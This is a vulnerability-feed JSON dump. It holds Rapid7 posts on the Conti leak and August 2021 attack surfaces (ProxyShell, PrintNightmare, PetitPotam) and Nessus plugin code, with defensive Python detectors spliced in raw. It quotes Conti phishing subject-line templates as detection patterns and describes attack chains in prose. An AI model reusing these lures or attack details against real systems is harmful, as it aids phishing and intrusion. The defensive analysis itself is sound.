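The spintax in Appendix B is as useful to a defender as to the operator: a `{a|b|c}` group is just an alternation, so every template compiles to a regular expression that recognises all of its variants at once. The block below is an added example, not part of the Rapid7 post and not Conti tooling. It takes five of the subject-line ("T:") templates above, transcribed with the Cyrillic all-caps placeholders (for instance "invoice number") written as a `<VAR>` token that is this example's own convention, compiles them, and reports which template a subject line was generated from. It folds Cyrillic look-alike letters before matching because the leaked body text itself contains one (the Cyrillic "а" in "аll"). The sample subjects at the bottom are constructed for the demonstration.

```python
import re
from functools import reduce
from operator import mul

# Five "T:" (subject) lines transcribed from the leaked spintax in Appendix B.
# Where the leak has a Cyrillic all-caps placeholder (e.g. НОМЕР ИНВОЙСА,
# "invoice number") that the mailer fills in, this example writes <VAR>;
# that token is a convention of this example, not of the leak.
SUBJECT_TEMPLATES = [
    "{Payment|Deposit payment} {invoice|receipt} {#|№|No. }<VAR> {prepared|formed}",
    "{Invoice|Given invoice|Bill} {we|we have|we’ve} {sent|mailed|delivered} to you "
    "{is paid|is covered|is processed}",
    "{Missing|Additional} payment {information|details|info} reminder",
    "{Invoicing|Invoice|Agreement|Contract|Payment} {info|data|information|details}",
    "Your {order|purchase|on-line order|last order} <VAR> payment {processed|obtained|received}",
]

# Cyrillic letters that render like Latin ones (the leaked body text itself
# contains one: the "а" in "аll"), plus the curly apostrophe used in the leak.
_HOMOGLYPHS = str.maketrans({
    "а": "a", "е": "e", "о": "o", "р": "p", "с": "c", "х": "x", "у": "y", "і": "i",
    "А": "A", "В": "B", "Е": "E", "К": "K", "М": "M", "Н": "H", "О": "O",
    "Р": "P", "С": "C", "Т": "T", "Х": "X", "’": "'",
})

_SPIN = re.compile(r"\{([^{}]*)\}")   # one {alt1|alt2|...} group


def normalize(text):
    """Fold confusable letters and apostrophes, collapse runs of whitespace."""
    return " ".join(text.translate(_HOMOGLYPHS).split())


def _literal(text):
    """Regex for non-spintax text: whitespace becomes \\s* (alternatives differ in
    trailing spaces, e.g. "No. " vs "#"), <VAR> becomes one non-space token."""
    chunks = []
    for part in text.split("<VAR>"):
        chunks.append(r"\s*".join(re.escape(tok) for tok in re.split(r"\s+", part)))
    return r"\S+".join(chunks)


def spintax_to_regex(template):
    """Compile one spintax template: each {a|b|c} becomes a non-capturing
    alternation (longest alternative first), everything else stays literal."""
    out, pos = [], 0
    for m in _SPIN.finditer(template):
        out.append(_literal(template[pos:m.start()]))
        alts = sorted(m.group(1).split("|"), key=len, reverse=True)
        out.append("(?:" + "|".join(_literal(a) for a in alts) + ")")
        pos = m.end()
    out.append(_literal(template[pos:]))
    return "".join(out)


def variant_count(template):
    """How many distinct subject lines one template can generate."""
    return reduce(mul, (len(m.group(1).split("|")) for m in _SPIN.finditer(template)), 1)


_COMPILED = [(t, re.compile(spintax_to_regex(normalize(t)), re.IGNORECASE))
             for t in SUBJECT_TEMPLATES]


def match_subject(subject):
    """Return the template a subject line was generated from, or None."""
    folded = normalize(subject)
    for template, pattern in _COMPILED:
        if pattern.fullmatch(folded):
            return template
    return None


if __name__ == "__main__":
    # Constructed sample subjects: three generated from the templates (one with a
    # Cyrillic "а" in "payment"), one benign.
    for subject in ("Deposit payment receipt No. 4471 formed",
                    "Invoice we’ve sent to you is paid",
                    "Missing p\u0430yment details reminder",
                    "Re: lunch on Friday"):
        print(f"{subject!r:48} -> {match_subject(subject)}")
    for t in SUBJECT_TEMPLATES:
        print(f"{variant_count(t):3d} variants: {t}")
```

Run it over a mail gateway's subject log: a full match on any template is strong evidence the message came from this kit, since a human writer rarely lands on an exact variant. The expected failure mode is a false negative, not a false positive: the operator can regenerate the spintax at any time, and the patterns here are anchored to the whole subject, so treat a hit as a high-confidence indicator and a miss as no information.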
"exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2020-1472", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-44228"], "modified": "2022-03-01T19:15:58", "id": "RAPID7BLOG:24E0BE5176F6D3963E1824AD4A55019E", "href": "https://blog.rapid7.com/2022/03/01/conti-ransomware-group-internal-chats-leaked-over-russia-ukraine-conflict/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-25T01:34:04", "description": "\n\n_See the `Updates` section at the end of this post for new information as it comes to light._\n\nWhether you attended virtually, IRL, or not at all, Black Hat and DEF CON have officially wrapped, and security folks\u2019 brains are replete with fresh information on new (and some not-so-new) vulnerabilities and exploit chains. The \u201chacker summer camp\u201d conferences frequently also highlight attack surface area that may _not_ be net-new \u2014 but that is subjected to renewed and redoubled community interest coming out of Vegas week. See Rapid7\u2019s summaries [here](<https://www.rapid7.com/blog/post/2021/08/05/black-hat-recap-1/>) and [here](<https://www.rapid7.com/blog/post/2021/08/06/black-hat-recap-2/>).\n\nHere\u2019s the specific attack surface area and a few of the exploit chains we\u2019re keeping our eye on right now:\n\n * Orange Tsai stole the show (as always) at Black Hat with a talk on fresh **Microsoft Exchange** attack surface area. 
All in all, Orange discussed CVEs from [what appears to be four separate attack chains](<https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html>) \u2014including the ProxyLogon exploit chain that made headlines when it hit exposed Exchange servers as a zero-day attack [back in March](<https://www.rapid7.com/blog/post/2021/03/03/mass-exploitation-of-exchange-server-zero-day-cves-what-you-need-to-know/>) and the \u201cProxyShell\u201d exploit chain, which debuted at Pwn2Own and targets three now-patched CVEs in Exchange. Exchange continues to be a critically important attack surface area, and defenders should keep patched on a top-priority or zero-day basis wherever possible.\n * Print spooler vulnerabilities continue to cause nightmares. DEF CON saw the release of new privilege escalation exploits for Windows Print Spooler, and Black Hat featured a talk by Sangfor Technologies researchers that chronicled both [new Windows Print Spooler vulnerabilities](<https://attackerkb.com/assessments/85a30c9a-e126-4ec0-bda4-d166e03c5390>) and past patch bypasses for vulns like CVE-2020-1048 (whose patch was bypassed three times). Given that many defenders are still trying to remediate the \u201cPrintNightmare\u201d vulnerability from several weeks ago, it\u2019s fair to say that Windows Print Spooler will remain an important attack surface area to prioritize in future Patch Tuesdays.\n * There\u2019s also a new vulnerability in Pulse Connect Secure VPNs that caught our attention \u2014 the vuln is actually a bypass for CVE-2020-8260, which came out last fall and evidently didn\u2019t completely fade away \u2014 despite the fact that it\u2019s authenticated and requires admin access. 
With CISA\u2019s warnings about APT attacks against Pulse Connect Secure devices, it\u2019s probably wise to patch CVE-2021-22937 quickly.\n * And finally, the SpecterOps crew gave a highly anticipated Black Hat talk on several new attack techniques that [abuse Active Directory Certificate Services](<https://posts.specterops.io/certified-pre-owned-d95910965cd2>) \u2014 something we covered previously in our summary of the [PetitPotam attack chain](<https://www.rapid7.com/blog/post/2021/08/03/petitpotam-novel-attack-chain-can-fully-compromise-windows-domains-running-ad-cs/>). This is neat research for red teams, and it may well show up on blue teams\u2019 pentest reports.\n\n### Microsoft Exchange ProxyShell chain\n\n**Patches:** Available \n**Threat status:** Possible threat (at least one report of exploitation in the wild)\n\nIt goes without saying that Microsoft Exchange is a high-value, popular attack surface that gets constant attention from threat actors and researchers alike. That attention is increasing yet again after prominent security researcher Orange Tsai gave a talk at Black Hat USA last week revealing details on an attack chain first demonstrated at Pwn2Own. The chain, dubbed \u201cProxyShell,\u201d allows an attacker to take over an unpatched Exchange server. ProxyShell is similar to ProxyLogon (i.e., [CVE-2021-26855](<https://attackerkb.com/assessments/a5c77ede-3824-4176-a955-d6cf9a6a7417>) and [CVE-2021-27065](<https://attackerkb.com/assessments/74177979-e2ef-4078-9f91-993964292cfa>)), which continues to be popular in targeted attacks and opportunistic scans despite the fact that it was patched in March 2021.\n\nTwo of the three vulnerabilities used for ProxyShell (CVE-2021-34473 and CVE-2021-34523) were fixed by Microsoft\u2019s April 2021 Exchange security update and the third (CVE-2021-31207) in May 2021; Microsoft did not publish advisories for the two April fixes until July, which is why their CVE entries look newer than the patch. 
As of August 9, 2021, private exploits have already been developed, and it\u2019s probably only a matter of time before public exploit code is released, which may allow for broader exploitation of the vulns in this attack chain (in spite of its complexity!). Rapid7 estimates that close to 75,000 ProxyShell-vulnerable Exchange servers are online, and that figure is a lower bound.\n\nWe strongly recommend that Exchange admins confirm that updates have been applied appropriately; if you haven\u2019t patched yet, you should do so immediately on an emergency basis.\n\nOne gotcha when it comes to Exchange administration is that Microsoft only releases security fixes for the [two most recent Cumulative Update versions](<https://docs.microsoft.com/en-us/exchange/new-features/updates>), so it\u2019s vital to stay up to date with these quarterly releases in order to react quickly when new patches are published.\n\nProxyShell CVEs:\n\n * [CVE-2021-31207](<https://nvd.nist.gov/vuln/detail/CVE-2021-31207>)\n * [CVE-2021-34473](<https://nvd.nist.gov/vuln/detail/CVE-2021-34473>)\n * [CVE-2021-34523](<https://nvd.nist.gov/vuln/detail/CVE-2021-34523>)\n\n### Windows Print Spooler \u2014 and more printer woes\n\n**Patches:** Varies by CVE, mostly available \n**Threat status:** Varies by CVE, active and impending\n\nThe Windows Print Spooler was the subject of renewed attention after the premature disclosure of the PrintNightmare vulnerability earlier this summer, followed by new Black Hat and DEF CON talks last week. Among the CVEs discussed were a quartet of 2020 vulns (three of which were bypasses descended from CVE-2020-1048, which has been exploited in the wild since last year), three new remote code execution vulnerabilities arising from memory corruption flaws, and two new local privilege escalation vulnerabilities highlighted by researcher [Jacob Baines](<https://twitter.com/Junior_Baines>). 
Of this last group, one vulnerability \u2014 CVE-2021-38085 \u2014 remains unpatched.\n\nOn August 11, 2021, Microsoft assigned [CVE-2021-36958](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36958>) to the latest Print Spooler remote code execution vulnerability which appears to require local system access and user interaction. Further details are limited at this time. However, as mitigation, Microsoft is continuing to recommend stopping and disabling the Print Spooler service. Even after this latest zero-day vulnerability is patched, we strongly recommend leaving the Print Spooler service disabled wherever possible. Read Rapid7\u2019s [blog on PrintNightmare](<https://www.rapid7.com/blog/post/2021/06/30/cve-2021-1675-printnightmare-patch-does-not-remediate-vulnerability/>) for further details and updates.\n\nWindows Print Spooler and related CVEs:\n\n * [CVE-2020-1048](<https://attackerkb.com/topics/QoQvwrIqEV/cve-2020-1048-windows-print-spooler-elevation-of-privilege-vulnerability?referrer=blog>) (elevation of privilege vuln in Windows Print Spooler presented at Black Hat 2020; exploited in the wild, Metasploit module available)\n * [CVE-2020-1337](<https://attackerkb.com/topics/mEEwlfrTK3/cve-2020-1337?referrer=blog>) (patch bypass for CVE-2020-1048; Metasploit module available)\n * [CVE-2020-17001](<https://attackerkb.com/topics/oGAzAwKy1N/cve-2020-17001?referrer=blog>) (patch bypass variant for CVE-2020-1048)\n * [CVE-2020-17014](<https://attackerkb.com/topics/N9XhrkViyk/cve-2020-17014?referrer=blog>) (patch bypass variant for CVE-2020-1048)\n * [CVE-2020-1300](<https://attackerkb.com/topics/43jdEqsVY1/cve-2020-1300?referrer=blog>) (local privilege escalation technique known as \u201c[EvilPrinter](<https://twitter.com/R3dF09/status/1271485928989528064>)\u201d presented at DEF CON 2020)\n * [CVE-2021-24088](<https://attackerkb.com/assessments/85a30c9a-e126-4ec0-bda4-d166e03c5390>) (new remote code execution vulnerability in the Windows local 
spooler, as presented at Black Hat 2021)\n * [CVE-2021-24077](<https://attackerkb.com/topics/wiyGYban1l/cve-2021-24077?referrer=blog>) (new remote code execution vulnerability in the Windows Fax Service, as presented at Black Hat 2021)\n * [CVE-2021-1722](<https://attackerkb.com/topics/v1Qm7veSwf/cve-2021-1722?referrer=blog>) (new remote code execution vulnerability in the Windows Fax Service, as presented at Black Hat 2021)\n * [CVE-2021-1675](<https://attackerkb.com/topics/dI1bxlM0ay/cve-2021-1675?referrer=blog>) (elevation of privilege vuln in Windows Print Spooler patched in June 2021)\n * [CVE-2021-34527](<https://attackerkb.com/topics/MIHLz4sY3s/cve-2021-34527-printnightmare?referrer=blog>), aka \u201cPrintNightmare\u201d\n * [CVE-2021-35449](<https://attackerkb.com/topics/9sV2bS0OSj/cve-2021-35449?referrer=blog>) (print driver local privilege escalation vulnerability, as [presented](<https://www.youtube.com/watch?v=vdesswZYz-8>) at DEF CON 2021; Metasploit module in progress)\n * [CVE-2021-38085](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38085>) (**unpatched** print driver local privilege escalation vulnerability, as [presented](<https://www.youtube.com/watch?v=vdesswZYz-8>) at DEF CON 2021; Metasploit module in progress)\n * [CVE-2021-36958](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36958>) (**unpatched** remote code execution vulnerability; announced August 11, 2021)\n\nCurrently, both [PrintNightmare](<https://www.rapid7.com/blog/post/2021/06/30/cve-2021-1675-printnightmare-patch-does-not-remediate-vulnerability/>) CVE-2021-34527 and CVE-2020-1048 are known to be exploited in the wild. As the list above demonstrates, patching print spooler and related vulns quickly and completely has been a challenge for Microsoft for the past year or so. The multi-step mitigations required for some vulnerabilities also give attackers an advantage. 
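The hardening this section calls for reduces, on each Windows host, to two things: whether the Print Spooler service is running at all, and the Point and Print policy values that decide whether a non-administrator can install or update a printer driver. The audit below is an added example, not Rapid7's or Microsoft's code. It reads the `PointAndPrint` policy key under `HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers` (the key Microsoft's CVE-2021-34527 guidance refers to) and asks the Service Control Manager about the spooler with `sc query`, but keeps the assessment in a separate function so it can also be run against values exported from other machines. The critical/high/medium/low labels are this example's own; the meaning of each value follows the Point and Print Restrictions policy and the August 2021 driver-installation change (KB5005652).

```python
import platform
import subprocess

# Point and Print policy key (under HKLM) named in Microsoft's CVE-2021-34527 guidance.
POLICY_KEY = r"SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint"
VALUE_NAMES = (
    "NoWarningNoElevationOnInstall",               # 1 = no warning or elevation on driver install
    "UpdatePromptSettings",                        # 1 or 2 = reduced or no prompt on driver update
    "RestrictDriverInstallationToAdministrators",  # 0 = non-admins may install drivers
)


def assess_point_and_print(values, spooler_running=True):
    """Rate one host's print-driver exposure from its PointAndPrint policy values.

    values maps value name -> DWORD; a missing name means "not configured".
    Returns (severity, finding) pairs, most severe first. The severity labels
    are this example's own, not Microsoft's."""
    if not spooler_running:
        return [("info", "Print Spooler is stopped: its RPC attack surface is not reachable")]
    findings = []
    if values.get("NoWarningNoElevationOnInstall", 0) == 1:
        # Per Microsoft's update guide the CVE-2021-34527 fix does nothing with
        # this value set: the host is vulnerable by design, patched or not.
        findings.append(("critical", "NoWarningNoElevationOnInstall=1 re-opens CVE-2021-34527 "
                                     "even on a patched host"))
    if values.get("UpdatePromptSettings", 0) in (1, 2):
        findings.append(("high", "UpdatePromptSettings=%d suppresses the driver-update prompt"
                                 % values["UpdatePromptSettings"]))
    restrict = values.get("RestrictDriverInstallationToAdministrators")
    if restrict == 0:
        findings.append(("medium", "RestrictDriverInstallationToAdministrators=0: non-admins "
                                   "may install print drivers"))
    elif restrict is None:
        findings.append(("low", "RestrictDriverInstallationToAdministrators not set: restricted "
                                "only if the August 2021 update (KB5005652) is installed"))
    if not findings:
        findings.append(("ok", "Point and Print policy is hardened; still disable the spooler "
                               "wherever the host does not need to print"))
    return findings


def read_point_and_print():
    """Read the policy values from the local registry (Windows only)."""
    import winreg  # standard library, but only present on Windows
    values = {}
    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, POLICY_KEY) as key:
            for name in VALUE_NAMES:
                try:
                    values[name] = winreg.QueryValueEx(key, name)[0]
                except FileNotFoundError:
                    pass  # value not configured
    except FileNotFoundError:
        pass  # whole policy key absent: nothing configured
    return values


def spooler_is_running():
    """Ask the Service Control Manager whether the Spooler service is running."""
    result = subprocess.run(["sc", "query", "Spooler"], capture_output=True, text=True)
    return "RUNNING" in result.stdout


if __name__ == "__main__":
    if platform.system() != "Windows":
        raise SystemExit("Run this on the Windows host you want to audit.")
    for severity, finding in assess_point_and_print(read_point_and_print(), spooler_is_running()):
        print(f"[{severity}] {finding}")
```

`sc query` reports the current state only; check the start type as well (`sc qc Spooler`), because a service that is stopped but still set to Automatic comes back at the next reboot and with it the attack surface this section is about.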
Defenders should harden printer setups wherever possible, including against malicious driver installation.\n\n### Pulse Connect Secure CVE-2021-22937\n\n**Patch:** Available \n**Threat status:** Impending (Exploitation expected soon)\n\nOn Monday, August 2, 2021, Ivanti published [Security Advisory SA44858](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44858>) which, among other fixes, includes a fix for CVE-2021-22937 for Pulse Connect Secure VPN appliances running 9.1R11 or prior. Successful exploitation of this vulnerability, which carries a CVSSv3 score of 9.1, requires an authenticated administrator account and yields remote code execution (RCE) as user `root`.\n\nPublic proof-of-concept (PoC) exploit code has not been released as of this writing. However, this vulnerability is a bypass of the patch for [CVE-2020-8260](<https://attackerkb.com/topics/MToDzANCY4/cve-2020-8260?referrer=search#vuln-details>), an authenticated code execution vulnerability in the admin interface (uncontrolled extraction of an uploaded archive) disclosed in October 2020 that attackers went on to use in the wild.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) has been monitoring the [Exploitation of Pulse Connect Secure Vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa21-110a>), demonstrating that attackers have been targeting Ivanti Pulse Connect Secure products for over a year. 
Due to attacker focus on Pulse Connect Secure products, and especially last year\u2019s CVE-2020-8260, Rapid7 recommends patching CVE-2021-22937 as soon as possible.\n\n### PetitPotam: Windows domain compromise\n\n**Patches:** Available \n**Threat status:** Threat (Exploited in the wild)\n\nIn July 2021, security researcher [Topotam](<https://github.com/topotam>) published a [PoC implementation](<https://github.com/topotam/PetitPotam>) of a novel NTLM relay attack christened \u201cPetitPotam.\u201d The PoC coerces a Windows host, including a domain controller, into authenticating to an attacker-controlled machine over the EFSRPC (MS-EFSR) interface; relaying that NTLM authentication to the web enrollment endpoint of Active Directory Certificate Services (AD CS) yields a certificate for the coerced machine account, which lets a remote, unauthenticated attacker take over the domain. Rapid7 researchers have tested public PoC code against a Windows domain controller setup and confirmed exploitability. One of our [senior researchers](<https://twitter.com/wvuuuuuuuuuuuuu>) summed it up with: "This attack is too easy." You can read Rapid7\u2019s full blog post [here](<https://www.rapid7.com/blog/post/2021/08/03/petitpotam-novel-attack-chain-can-fully-compromise-windows-domains-running-ad-cs/>).\n\nOn August 10, 2021, Microsoft released a patch for the PetitPotam NTLM relay attack vector as part of the August 2021 Patch Tuesday. Tracked as [CVE-2021-36942](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36942>), the update blocks the affected API calls [OpenEncryptedFileRawA](<https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-openencryptedfilerawa>) and [OpenEncryptedFileRawW](<https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-openencryptedfileraww>) through the LSARPC interface. 
Windows administrators should prioritize patching domain controllers and will still need to take the additional steps listed in [KB5005413](<https://support.microsoft.com/en-us/topic/kb5005413-mitigating-ntlm-relay-attacks-on-active-directory-certificate-services-ad-cs-3612b773-4043-4aa9-b23d-b87910cd3429>) (enabling Extended Protection for Authentication and requiring HTTPS on the AD CS web enrollment services, and disabling NTLM where possible) to ensure their systems are fully mitigated.\n\n### Rapid7 customers\n\nInsightVM and Nexpose customers can assess their exposure to the vulnerabilities in this post with authenticated vulnerability checks. Please note that details haven\u2019t yet been released on CVE-2021-38085 and CVE-2021-36958; therefore, they are still awaiting analysis and check development.\n\n### Updates\n\n**Pulse Connect Secure CVE-2021-22937** \nOn August 24, 2021, the Cybersecurity & Infrastructure Security Agency (CISA) released [Malware Analysis Report (AR21-236E)](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-236e>) which includes indicators of compromise (IOCs) to assist with Pulse Connect Secure investigations.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-12T17:13:25", "type": "rapid7blog", "title": "Popular Attack Surfaces, August 2021: What You Need to Know", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", 
"baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1048", "CVE-2020-1300", "CVE-2020-1337", "CVE-2020-17001", "CVE-2020-17014", "CVE-2020-8260", "CVE-2021-1675", "CVE-2021-1722", "CVE-2021-22937", "CVE-2021-24077", "CVE-2021-24088", "CVE-2021-26855", "CVE-2021-27065", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-35449", "CVE-2021-36942", "CVE-2021-36958", "CVE-2021-38085"], "modified": "2021-08-12T17:13:25", "id": "RAPID7BLOG:5CDF95FB2AC31414FD390E0E0A47E057", "href": "https://blog.rapid7.com/2021/08/12/popular-attack-surfaces-august-2021-what-you-need-to-know/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2023-05-18T15:31:02", "description": "The version of Kaseya VSA installed on the remote host is affected by multiple vulnerabilities as referenced in the vendor advisory:\n\n - Credentials leak and business logic flaw. (CVE-2021-30116)\n\n - Cross-Site Scripting vulnerability (XSS). (CVE-2021-30119)\n\n - 2FA Authentication bypass. 
(CVE-2021-30120)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-07-12T00:00:00", "type": "nessus", "title": "Kaseya VSA < 9.5.7a Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-30116", "CVE-2021-30119", "CVE-2021-30120"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/a:kaseya:virtual_system_administrator", "cpe:/a:kaseya:vsa"], "id": "KASEYA_9_5_7_2994.NASL", "href": "https://www.tenable.com/plugins/nessus/151494", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(151494);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2021-30116\", \"CVE-2021-30119\", \"CVE-2021-30120\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0033\");\n\n script_name(english:\"Kaseya VSA < 9.5.7a Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Kaseya VSA instance installed on the remote host is affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Kaseya VSA installed on the remote host is affected by multiple vulnerabilities as \nreferenced in the vendor advisory:\n\n - Credentials leak and business logic flaw. (CVE-2021-30116)\n\n - Cross-Site Scripting vulnerability (XSS). (CVE-2021-30119)\n\n - 2FA Authentication bypass. 
An authenticated, remote attacker can exploit this to bypass and run arbitrary code with SYSTEM privileges.", "cvss3": {}, "published": "2021-07-08T00:00:00", "type": "nessus", "title": "KB5004958: Windows Server 2012 R2 OOB Security Update RCE (July 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-34527"], "modified": "2023-04-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JUL_5004958.NASL", "href": "https://www.tenable.com/plugins/nessus/151477", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(151477);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/07\");\n\n script_cve_id(\"CVE-2021-34527\");\n script_xref(name:\"IAVA\", value:\"2021-A-0299\");\n script_xref(name:\"MSKB\", value:\"5004954\");\n script_xref(name:\"MSKB\", value:\"5004958\");\n script_xref(name:\"MSFT\", value:\"MS21-5004954\");\n script_xref(name:\"MSFT\", value:\"MS21-5004958\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/07/20\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0034\");\n\n script_name(english:\"KB5004958: Windows Server 2012 R2 OOB Security Update RCE (July 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"A remote command execution vulnerability exists in Windows Print Spooler service improperly performs privileged file \noperations. 
An authenticated, remote attacker can exploit this to bypass and run arbitrary code with SYSTEM privileges.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5004954\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5004958\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update 5004958\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-34527\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/07/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/07/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/07/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-07';\nkbs = make_list(\n '5004958'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.3', \n sp:0,\n rollup_date:'06_2021_07_01',\n bulletin:bulletin,\n rollup_kb_list:[5004958])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:31:00", "description": "A remote command execution vulnerability exists in Windows Print Spooler service improperly performs privileged file operations. 
